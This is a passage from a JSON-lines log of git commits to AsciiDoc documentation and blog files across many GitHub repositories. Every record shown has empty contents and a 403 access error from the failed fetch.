2015-07-15-Android-Intent-Image-Picker.adoc","repos":"KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io,KozytyPress\/kozytypress.github.io","old_file":"_posts\/2015-07-15-Android-Intent-Image-Picker.adoc","new_file":"_posts\/2015-07-15-Android-Intent-Image-Picker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KozytyPress\/kozytypress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"04a556204678df81ffa9cb26b05e168f923b1d99","subject":"Update 2016-06-07-Hello-Princess.adoc","message":"Update 2016-06-07-Hello-Princess.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-06-07-Hello-Princess.adoc","new_file":"_posts\/2016-06-07-Hello-Princess.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a97a279cd771727d96643bd68fbd946c4289dc7","subject":"Update 2017-02-08-fpv-drones-101.adoc","message":"Update 2017-02-08-fpv-drones-101.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2017-02-08-fpv-drones-101.adoc","new_file":"_posts\/2017-02-08-fpv-drones-101.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63573fe5f779933d57bc68577e2c9f281351a799","subject":"Renamed '_posts\/2020-04-27-The-onboarding.adoc' to '_posts\/2020-04-27-the-onboarding.adoc'","message":"Renamed '_posts\/2020-04-27-The-onboarding.adoc' to '_posts\/2020-04-27-the-onboarding.adoc'","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-04-27-the-onboarding.adoc","new_file":"_posts\/2020-04-27-the-onboarding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6852f5252d749565a38da07ffec3761509c603f5","subject":"Documentation for function data source","message":"Documentation for function data source\n","repos":"vaadin\/vaadin-grid,vaadin\/components,Saulis\/components-1,Peppe\/vaadin-grid,Saulis\/components-1,Peppe\/vaadin-grid,vaadin\/components,Saulis\/components-1,vaadin\/components,vaadin\/vaadin-grid","old_file":"docs\/lazy-loading.adoc","new_file":"docs\/lazy-loading.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Saulis\/components-1.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f13083973e8b29515cf48d49540dded3cc5c8c74","subject":"update code documentation","message":"update code documentation\n","repos":"psprint\/zplugin,psprint\/zplugin,psprint\/zplugin","old_file":"zsdoc\/zplugin.zsh.adoc","new_file":"zsdoc\/zplugin.zsh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/psprint\/zplugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07aec06521737b8fa6b69c549a428240ed1c5d3e","subject":"Update 2016-07-13-Git-command.adoc","message":"Update 2016-07-13-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-13-Git-command.adoc","new_file":"_posts\/2016-07-13-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"badf6978c5d1fcec26a423a985b44dd65c4ad68a","subject":"y2b create post XBOX 360 Limited Edition Console Comparison","message":"y2b create post XBOX 360 Limited Edition Console Comparison","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-04-10-XBOX-360-Limited-Edition-Console-Comparison.adoc","new_file":"_posts\/2012-04-10-XBOX-360-Limited-Edition-Console-Comparison.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86963e72017078ee9fedc664dfce866de7400c85","subject":"Update 2017-03-23-Hello-World.adoc","message":"Update 2017-03-23-Hello-World.adoc","repos":"jbutzprojects\/jbutzprojects.github.io,jbutzprojects\/jbutzprojects.github.io,jbutzprojects\/jbutzprojects.github.io,jbutzprojects\/jbutzprojects.github.io","old_file":"_posts\/2017-03-23-Hello-World.adoc","new_file":"_posts\/2017-03-23-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbutzprojects\/jbutzprojects.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c821e081dbdd649b7ede05774e15619d9884c43d","subject":"Update 2017-08-12-Finals-Week.adoc","message":"Update 
2017-08-12-Finals-Week.adoc","repos":"ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io","old_file":"_posts\/2017-08-12-Finals-Week.adoc","new_file":"_posts\/2017-08-12-Finals-Week.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashelle\/ashelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cd1beb028974d07ae50666c7450705bbdb5442f","subject":"add pitr docs","message":"add pitr docs\n","repos":"CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,CrunchyData\/crunchy-containers,the1forte\/crunchy-containers","old_file":"docs\/pitr.asciidoc","new_file":"docs\/pitr.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/the1forte\/crunchy-containers.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2d381af0af449eb28f102f56ec4f6560609ffd71","subject":"Add to NOTES","message":"Add to NOTES\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ccb5d0b40baeec5a0aedd3f46e91a5db77b273d","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79c19ffb5d27b48ec6581722ef81f6d346303862","subject":"Update 2020-03-09-Translate-GLSL-to-SPIR-V-for-Vulkan-at-Runtime.adoc","message":"Update 2020-03-09-Translate-GLSL-to-SPIR-V-for-Vulkan-at-Runtime.adoc","repos":"lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io,lxjk\/lxjk.github.io","old_file":"_posts\/2020-03-09-Translate-GLSL-to-SPIR-V-for-Vulkan-at-Runtime.adoc","new_file":"_posts\/2020-03-09-Translate-GLSL-to-SPIR-V-for-Vulkan-at-Runtime.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lxjk\/lxjk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32f61985de61fa28a8de032c9cce7b74e4f63adc","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"7d40585f6c517e4118485b47330e649b1e3197ed","subject":"docs: CLOUD-552: document auth-method config","message":"docs: CLOUD-552: document auth-method config\n","repos":"douglaspalmer\/application-templates,bparees\/application-templates,errantepiphany\/application-templates,jboss-openshift\/application-templates,josefkarasek\/application-templates,bdecoste\/application-templates,kyguy\/application-templates,knrc\/application-templates,rcernich\/application-templates","old_file":"eap\/README_SSO.adoc","new_file":"eap\/README_SSO.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jboss-openshift\/application-templates.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6232d0f73a0bd57e06eb1eb148cca60f3c177509","subject":"Update 2017-02-27-Slavery.adoc","message":"Update 2017-02-27-Slavery.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2017-02-27-Slavery.adoc","new_file":"_posts\/2017-02-27-Slavery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"703f8d7b9e4b180c3dceffb7116b417d9a3f0705","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7e159d4a42bc0c4c3a67e2789edc5798e33eea9","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f825d424787d5e2ea8eed042fec21e5d9aec10b","subject":"Update 2018-03-15-try-ecr.adoc","message":"Update 2018-03-15-try-ecr.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-15-try-ecr.adoc","new_file":"_posts\/2018-03-15-try-ecr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"445af3ecf572b1fceca2700d77dc8807c4b61248","subject":"[DOCS] Format the authenticate API (elastic\/x-pack-elasticsearch#2572)","message":"[DOCS] Format the authenticate API (elastic\/x-pack-elasticsearch#2572)\n\nOriginal commit: 
elastic\/x-pack-elasticsearch@bc486dc6be01eb0298a99fe10b4282f311e93faf\n","repos":"GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch","old_file":"docs\/en\/rest-api\/security\/authenticate.asciidoc","new_file":"docs\/en\/rest-api\/security\/authenticate.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9833de618d3208ede246781323e07c73781d23d5","subject":"Boards and Library manager command line interface documentation","message":"Boards and Library manager command line interface 
documentation\n","repos":"zenmanenergy\/Arduino,NaSymbol\/Arduino,drpjk\/Arduino,PeterVH\/Arduino,nandojve\/Arduino,ogahara\/Arduino,laylthe\/Arduino,steamboating\/Arduino,onovy\/Arduino,eddyst\/Arduino-SourceCode,jaimemaretoli\/Arduino,cscenter\/Arduino,tskurauskas\/Arduino,Chris--A\/Arduino,bigjosh\/Arduino,ashwin713\/Arduino,PaoloP74\/Arduino,bigjosh\/Arduino,ari-analytics\/Arduino,adafruit\/ESP8266-Arduino,stickbreaker\/Arduino,NaSymbol\/Arduino,probonopd\/Arduino,pdNor\/Arduino,SmartArduino\/Arduino-1,garci66\/Arduino,garci66\/Arduino,onovy\/Arduino,jaimemaretoli\/Arduino,karlitxo\/Arduino,ssvs111\/Arduino,ikbelkirasan\/Arduino,SmartArduino\/Arduino-1,lulufei\/Arduino,tskurauskas\/Arduino,ogahara\/Arduino,steamboating\/Arduino,tskurauskas\/Arduino,shiitakeo\/Arduino,NicoHood\/Arduino,bigjosh\/Arduino,eggfly\/arduino,ricklon\/Arduino,laylthe\/Arduino,Protoneer\/Arduino,OpenDevice\/Arduino,fungxu\/Arduino,andyvand\/Arduino-1,Protoneer\/Arduino,HCastano\/Arduino,NicoHood\/Arduino,adafruit\/ESP8266-Arduino,eduardocasarin\/Arduino,adamkh\/Arduino,ntruchsess\/Arduino-1,raimohanska\/Arduino,jmgonzalez00449\/Arduino,spapadim\/Arduino,bigjosh\/Arduino,acosinwork\/Arduino,ari-analytics\/Arduino,fungxu\/Arduino,PaoloP74\/Arduino,adamkh\/Arduino,vbextreme\/Arduino,superboonie\/Arduino,adafruit\/ESP8266-Arduino,KlaasDeNys\/Arduino,me-no-dev\/Arduino-1,paulo-raca\/ESP8266-Arduino,Alfredynho\/AgroSis,stickbreaker\/Arduino,ogferreiro\/Arduino,gestrem\/Arduino,gberl001\/Arduino,lulufei\/Arduino,NaSymbol\/Arduino,jabezGit\/Arduino,nandojve\/Arduino,superboonie\/Arduino,wdoganowski\/Arduino,chaveiro\/Arduino,jomolinare\/Arduino,xxxajk\/Arduino-1,andyvand\/Arduino-1,nkolban\/Arduino,ricklon\/Arduino,onovy\/Arduino,Chris--A\/Arduino,aichi\/Arduino-2,arunkuttiyara\/Arduino,EmuxEvans\/Arduino,ntruchsess\/Arduino-1,talhaburak\/Arduino,acosinwork\/Arduino,wilhelmryan\/Arduino,acosinwork\/Arduino,aichi\/Arduino-2,shannonshsu\/Arduino,onovy\/Arduino,paulmand3l\/Arduino,kidswong999\/Arduino,koltegirish\/Arduino,wayoda\/Arduino,SmartArduino\/Arduino-1,shannonshsu\/Arduino,jamesrob4\/Arduino,ssvs111\/Arduino,jamesrob4\/Arduino,zaiexx\/Arduino,NeuralSpaz\/Arduino,ntruchsess\/Arduino-1,karlitxo\/Arduino,mattvenn\/Arduino,xxxajk\/Arduino-1,SmartArduino\/Arduino-1,henningpohl\/Arduino,shannonshsu\/Arduino,vbextreme\/Arduino,jaehong\/Xmegaduino,ari-analytics\/Arduino,eduardocasarin\/Arduino,aichi\/Arduino-2,me-no-dev\/Arduino-1,weera00\/Arduino,talhaburak\/Arduino,tbowmo\/Arduino,adafruit\/ESP8266-Arduino,jaimemaretoli\/Arduino,adamkh\/Arduino,Gourav2906\/Arduino,raimohanska\/Arduino,damellis\/Arduino,pdNor\/Arduino,jaehong\/Xmegaduino,OpenDevice\/Arduino,myrtleTree33\/Arduino,fungxu\/Arduino,Protoneer\/Arduino,zaiexx\/Arduino,EmuxEvans\/Arduino,eggfly\/arduino,zenmanenergy\/Arduino,vbextreme\/Arduino,tomkrus007\/Arduino,xxxajk\/Arduino-1,niggor\/Arduino_cc,NicoHood\/Arduino,onovy\/Arduino,smily77\/Arduino,superboonie\/Arduino,Chris--A\/Arduino,wilhelmryan\/Arduino,zederson\/Arduino,niggor\/Arduino_cc,myrtleTree33\/Arduino,koltegirish\/Arduino,tomkrus007\/Arduino,raimohanska\/Arduino,bigjosh\/Arduino,onovy\/Arduino,karlitxo\/Arduino,PeterVH\/Arduino,ari-analytics\/Arduino,stickbreaker\/Arduino,drpjk\/Arduino,lukeWal\/Arduino,ikbelkirasan\/Arduino,PaoloP74\/Arduino,majenkotech\/Arduino,paulo-raca\/ESP8266-Arduino,eeijcea\/Arduino-1,vbextreme\/Arduino,nkolban\/Arduino,gberl001\/Arduino,andyvand\/Arduino-1,bsmr-arduino\/Arduino,Protoneer\/Arduino,tomkrus007\/Arduino,mangelajo\/Arduino,tommyli2014\/Arduino,jabezGit\/Arduino
,ashwin713\/Arduino,chaveiro\/Arduino,mateuszdw\/Arduino,niggor\/Arduino_cc,Chris--A\/Arduino,jomolinare\/Arduino,jamesrob4\/Arduino,ogferreiro\/Arduino,aichi\/Arduino-2,ikbelkirasan\/Arduino,mateuszdw\/Arduino,shannonshsu\/Arduino,eddyst\/Arduino-SourceCode,arunkuttiyara\/Arduino,tomkrus007\/Arduino,stickbreaker\/Arduino,ForestNymph\/Arduino_sources,smily77\/Arduino,snargledorf\/Arduino,Gourav2906\/Arduino,steamboating\/Arduino,ari-analytics\/Arduino,tbowmo\/Arduino,paulmand3l\/Arduino,ricklon\/Arduino,arunkuttiyara\/Arduino,chaveiro\/Arduino,bsmr-arduino\/Arduino,jmgonzalez00449\/Arduino,pdNor\/Arduino,Cloudino\/Arduino,shiitakeo\/Arduino,ForestNymph\/Arduino_sources,damellis\/Arduino,weera00\/Arduino,mangelajo\/Arduino,wdoganowski\/Arduino,steamboating\/Arduino,HCastano\/Arduino,ricklon\/Arduino,ntruchsess\/Arduino-1,aichi\/Arduino-2,paulmand3l\/Arduino,PeterVH\/Arduino,tannewt\/Arduino,jaehong\/Xmegaduino,ashwin713\/Arduino,Alfredynho\/AgroSis,NeuralSpaz\/Arduino,jabezGit\/Arduino,kidswong999\/Arduino,eggfly\/arduino,laylthe\/Arduino,HCastano\/Arduino,noahchense\/Arduino-1,KlaasDeNys\/Arduino,arunkuttiyara\/Arduino,mangelajo\/Arduino,aichi\/Arduino-2,ForestNymph\/Arduino_sources,raimohanska\/Arduino,stevemayhew\/Arduino,gonium\/Arduino,shiitakeo\/Arduino,superboonie\/Arduino,jmgonzalez00449\/Arduino,jabezGit\/Arduino,damellis\/Arduino,zederson\/Arduino,KlaasDeNys\/Arduino,PeterVH\/Arduino,Protoneer\/Arduino,zaiexx\/Arduino,superboonie\/Arduino,bsmr-arduino\/Arduino,gestrem\/Arduino,byran\/Arduino,bigjosh\/Arduino,zederson\/Arduino,probonopd\/Arduino,noahchense\/Arduino-1,pdNor\/Arduino,weera00\/Arduino,andyvand\/Arduino-1,stevemayhew\/Arduino,Protoneer\/Arduino,damellis\/Arduino,probonopd\/Arduino,nandojve\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,snargledorf\/Arduino,me-no-dev\/Arduino-1,smily77\/Arduino,tskurauskas\/Arduino,lukeWal\/Arduino,cscenter\/Arduino,kidswong999\/Arduino,sanyaade-iot\/Arduino-1,ricklon\/Arduino,paulo-raca\/ESP8266-Arduino,gonium\/Arduino,ForestNymph\/Arduino_sources,paulmand3l\/Arduino,bsmr-arduino\/Arduino,andyvand\/Arduino-1,ektor5\/Arduino,paulmand3l\/Arduino,jomolinare\/Arduino,Alfredynho\/AgroSis,nkolban\/Arduino,sanyaade-iot\/Arduino-1,niggor\/Arduino_cc,Cloudino\/Arduino,jomolinare\/Arduino,ogferreiro\/Arduino,ssvs111\/Arduino,tommyli2014\/Arduino,mattvenn\/Arduino,henningpohl\/Arduino,ashwin713\/Arduino,eeijcea\/Arduino-1,EmuxEvans\/Arduino,radut\/Arduino,ntruchsess\/Arduino-1,PaoloP74\/Arduino,ari-analytics\/Arduino,koltegirish\/Arduino,zaiexx\/Arduino,tomkrus007\/Arduino,KlaasDeNys\/Arduino,jabezGit\/Arduino,fungxu\/Arduino,ashwin713\/Arduino,wilhelmryan\/Arduino,vbextreme\/Arduino,wilhelmryan\/Arduino,ogahara\/Arduino,xxxajk\/Arduino-1,Gourav2906\/Arduino,shiitakeo\/Arduino,probonopd\/Arduino,ektor5\/Arduino,Cloudino\/Arduino,Gourav2906\/Arduino,NeuralSpaz\/Arduino,PaoloP74\/Arduino,shannonshsu\/Arduino,ssvs111\/Arduino,PaoloP74\/Arduino,tommyli2014\/Arduino,garci66\/Arduino,eeijcea\/Arduino-1,mattvenn\/Arduino,pdNor\/Arduino,ektor5\/Arduino,smily77\/Arduino,nandojve\/Arduino,NeuralSpaz\/Arduino,drpjk\/Arduino,KlaasDeNys\/Arduino,jaimemaretoli\/Arduino,NaSymbol\/Arduino,sanyaade-iot\/Arduino-1,tbowmo\/Arduino,leftbrainstrain\/Arduino-ESP8266,adamkh\/Arduino,danielchalef\/Arduino,smily77\/Arduino,chaveiro\/Arduino,myrtleTree33\/Arduino,Cloudino\/Cloudino-Arduino-IDE,ogahara\/Arduino,talhaburak\/Arduino,eeijcea\/Arduino-1,jmgonzalez00449\/Arduino,stevemayhew\/Arduino,ntruchsess\/Arduino-1,me-no-dev\/Arduino-1,OpenDevice\/Arduino,lukeWal\/Arduino,garci6
6\/Arduino,arunkuttiyara\/Arduino,OpenDevice\/Arduino,shannonshsu\/Arduino,adafruit\/ESP8266-Arduino,ThoughtWorksIoTGurgaon\/Arduino,koltegirish\/Arduino,tomkrus007\/Arduino,ogferreiro\/Arduino,paulo-raca\/ESP8266-Arduino,tbowmo\/Arduino,NeuralSpaz\/Arduino,tannewt\/Arduino,ikbelkirasan\/Arduino,zenmanenergy\/Arduino,xxxajk\/Arduino-1,koltegirish\/Arduino,Protoneer\/Arduino,henningpohl\/Arduino,cscenter\/Arduino,PeterVH\/Arduino,lukeWal\/Arduino,eduardocasarin\/Arduino,Chris--A\/Arduino,kidswong999\/Arduino,danielchalef\/Arduino,lukeWal\/Arduino,PeterVH\/Arduino,tbowmo\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,leftbrainstrain\/Arduino-ESP8266,Gourav2906\/Arduino,OpenDevice\/Arduino,zenmanenergy\/Arduino,pdNor\/Arduino,myrtleTree33\/Arduino,byran\/Arduino,ricklon\/Arduino,paulo-raca\/ESP8266-Arduino,ikbelkirasan\/Arduino,karlitxo\/Arduino,NeuralSpaz\/Arduino,Alfredynho\/AgroSis,fungxu\/Arduino,eeijcea\/Arduino-1,tbowmo\/Arduino,karlitxo\/Arduino,snargledorf\/Arduino,Cloudino\/Arduino,eddyst\/Arduino-SourceCode,lulufei\/Arduino,drpjk\/Arduino,spapadim\/Arduino,nkolban\/Arduino,radut\/Arduino,mangelajo\/Arduino,ccoenen\/Arduino,KlaasDeNys\/Arduino,gestrem\/Arduino,ccoenen\/Arduino,byran\/Arduino,wayoda\/Arduino,tskurauskas\/Arduino,vbextreme\/Arduino,wayoda\/Arduino,PeterVH\/Arduino,acosinwork\/Arduino,ogferreiro\/Arduino,bsmr-arduino\/Arduino,ssvs111\/Arduino,eggfly\/arduino,adamkh\/Arduino,gestrem\/Arduino,wayoda\/Arduino,mattvenn\/Arduino,lukeWal\/Arduino,raimohanska\/Arduino,EmuxEvans\/Arduino,ccoenen\/Arduino,tannewt\/Arduino,tomkrus007\/Arduino,cscenter\/Arduino,snargledorf\/Arduino,niggor\/Arduino_cc,NicoHood\/Arduino,radut\/Arduino,ashwin713\/Arduino,talhaburak\/Arduino,bsmr-arduino\/Arduino,ForestNymph\/Arduino_sources,danielchalef\/Arduino,snargledorf\/Arduino,acosinwork\/Arduino,cscenter\/Arduino,ccoenen\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,eddyst\/Arduino-SourceCode,ashwin713\/Arduino,Chris--A\/Arduino,byran\/Arduino,stickbreaker\/Arduino,PaoloP74\/Arduino,smily77\/Arduino,NicoHood\/Arduino,spapadim\/Arduino,superboonie\/Arduino,ikbelkirasan\/Arduino,kidswong999\/Arduino,ogferreiro\/Arduino,eggfly\/arduino,shiitakeo\/Arduino,probonopd\/Arduino,stickbreaker\/Arduino,NicoHood\/Arduino,ogahara\/Arduino,gberl001\/Arduino,ccoenen\/Arduino,pdNor\/Arduino,gonium\/Arduino,KlaasDeNys\/Arduino,snargledorf\/Arduino,tskurauskas\/Arduino,gberl001\/Arduino,ForestNymph\/Arduino_sources,shiitakeo\/Arduino,tskurauskas\/Arduino,shiitakeo\/Arduino,drpjk\/Arduino,koltegirish\/Arduino,stevemayhew\/Arduino,adamkh\/Arduino,jomolinare\/Arduino,Cloudino\/Arduino,ektor5\/Arduino,niggor\/Arduino_cc,gestrem\/Arduino,adamkh\/Arduino,drpjk\/Arduino,jomolinare\/Arduino,gestrem\/Arduino,myrtleTree33\/Arduino,henningpohl\/Arduino,lulufei\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,steamboating\/Arduino,mateuszdw\/Arduino,jaehong\/Xmegaduino,radut\/Arduino,wdoganowski\/Arduino,probonopd\/Arduino,vbextreme\/Arduino,NeuralSpaz\/Arduino,Cloudino\/Cloudino-Arduino-IDE,nkolban\/Arduino,nkolban\/Arduino,Chris--A\/Arduino,jomolinare\/Arduino,adafruit\/ESP8266-Arduino,damellis\/Arduino,steamboating\/Arduino,ricklon\/Arduino,noahchense\/Arduino-1,HCastano\/Arduino,ikbelkirasan\/Arduino,jabezGit\/Arduino,Gourav2906\/Arduino,tbowmo\/Arduino,mattvenn\/Arduino,wayoda\/Arduino,radut\/Arduino,mateuszdw\/Arduino,ashwin713\/Arduino,zederson\/Arduino,paulo-raca\/ESP8266-Arduino,bigjosh\/Arduino,cscenter\/Arduino,Cloudino\/Cloudino-Arduino-IDE,SmartArduino\/Arduino-1,wilhelmryan\/Arduino,eeijcea\/Arduino-1,niggor\/Arduino_cc,weera00\
/Arduino,stevemayhew\/Arduino,ThoughtWorksIoTGurgaon\/Arduino,leftbrainstrain\/Arduino-ESP8266,bsmr-arduino\/Arduino,wdoganowski\/Arduino,andyvand\/Arduino-1,pdNor\/Arduino,SmartArduino\/Arduino-1,xxxajk\/Arduino-1,tommyli2014\/Arduino,me-no-dev\/Arduino-1,stickbreaker\/Arduino,chaveiro\/Arduino,ccoenen\/Arduino,gberl001\/Arduino,ntruchsess\/Arduino-1,paulmand3l\/Arduino,spapadim\/Arduino,stevemayhew\/Arduino,jamesrob4\/Arduino,EmuxEvans\/Arduino,radut\/Arduino,ntruchsess\/Arduino-1,ektor5\/Arduino,raimohanska\/Arduino,EmuxEvans\/Arduino,superboonie\/Arduino,Cloudino\/Cloudino-Arduino-IDE,HCastano\/Arduino,leftbrainstrain\/Arduino-ESP8266,wilhelmryan\/Arduino,byran\/Arduino,paulmand3l\/Arduino,kidswong999\/Arduino,me-no-dev\/Arduino-1,mateuszdw\/Arduino,fungxu\/Arduino,weera00\/Arduino,superboonie\/Arduino,tannewt\/Arduino,chaveiro\/Arduino,acosinwork\/Arduino,bsmr-arduino\/Arduino,lukeWal\/Arduino,jaehong\/Xmegaduino,mangelajo\/Arduino,jaimemaretoli\/Arduino,talhaburak\/Arduino,xxxajk\/Arduino-1,henningpohl\/Arduino,sanyaade-iot\/Arduino-1,ari-analytics\/Arduino,byran\/Arduino,weera00\/Arduino,NaSymbol\/Arduino,kidswong999\/Arduino,adamkh\/Arduino,henningpohl\/Arduino,danielchalef\/Arduino,HCastano\/Arduino,tommyli2014\/Arduino,Cloudino\/Cloudino-Arduino-IDE,egg